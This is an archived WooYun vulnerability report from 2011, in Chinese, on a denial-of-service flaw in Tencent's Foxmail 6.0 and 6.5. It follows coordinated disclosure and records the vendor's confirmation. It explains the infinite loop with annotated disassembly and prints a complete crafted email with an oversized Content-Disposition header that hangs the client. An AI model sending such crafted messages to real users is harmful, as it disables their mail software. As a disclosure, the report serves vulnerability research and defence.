漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02787
漏洞标题:Foxmail拒绝服务漏洞
相关厂商:腾讯
漏洞作者: mog
提交时间:2011-09-05 22:44
修复时间:2011-10-05 22:45
公开时间:2011-10-05 22:45
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-09-05: 细节已通知厂商并且等待厂商处理中
2011-09-06: 厂商已经确认,细节仅向厂商公开
2011-09-16: 细节向核心白帽子及相关领域专家公开
2011-09-26: 细节向普通白帽子公开
2011-10-06: 细节向实习白帽子公开
2011-10-05: 细节向公众公开
简要描述:
Foxmail 6.0,6.5存在拒绝服务漏洞,通过发送特殊的构造的邮件可使软件失去响应
详细说明:
foxmail没有对部分邮件字段进行正确的处理
007DA607 8D45 F8 /LEA EAX,DWORD PTR SS:[EBP-8]
007DA60A 8A543E FF |MOV DL,BYTE PTR DS:[ESI+EDI-1]
007DA60E E8 AD9AC2FF |CALL Foxmail.004040C0
007DA613 8B55 F8 |MOV EDX,DWORD PTR SS:[EBP-8]
007DA616 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
007DA619 E8 AE9BC2FF |CALL Foxmail.004041CC
007DA61E 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
007DA621 43 |INC EBX
007DA622 8BC6 MOV EAX,ESI
007DA624 E8 9B9BC2FF |CALL Foxmail.004041C4 ;取字符串长度
007DA629 8BFB |MOV EDI,EBX
007DA62B 81E7 FF000000 |AND EDI,0FF ;和0xff取与
007DA631 3BC7 |CMP EAX,EDI ;edi 和0xff取与后一定小于0xff,所有eax大于255字符长度就不会除法下面判断条件,进入死循环
007DA633 7C 14 |JL SHORT Foxmail.007DA649
007DA635 8A443E FF |MOV AL,BYTE PTR DS:[ESI+EDI-1]
007DA639 2C 0A |SUB AL,0A
007DA63B 74 0C |JE SHORT Foxmail.007DA649
007DA63D 2C 03 |SUB AL,3
007DA63F 74 08 |JE SHORT Foxmail.007DA649
007DA641 2C 13 |SUB AL,13
007DA643 74 04 |JE SHORT Foxmail.007DA649
007DA645 2C 1B |SUB AL,1B
007DA647 ^75 BE JNZ SHORT Foxmail.007DA607
漏洞证明:
测试邮件内容
From: "test"<test@163.com>
To: "test"<test@test.com>
Subject: test
X-Priority: 1
Content-Type: multipart/mixed;
boundary="=====001_Dragon874648247250_====="
--=====001_Dragon874648247250_=====
Content-Type: multipart/alternative;
boundary="=====003_Dragon874648247250_====="
--=====003_Dragon874648247250_=====
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: 7bit
test
--=====003_Dragon874648247250_=====--
--=====001_Dragon874648247250_=====
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
filename="t.txt"
c3Nzc3Nzc3Nzc3M=
--=====001_Dragon874648247250_=====--
修复方案:
版权声明:转载请注明来源 mog@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2011-09-06 15:44
厂商回复:
thx
最新状态:
暂无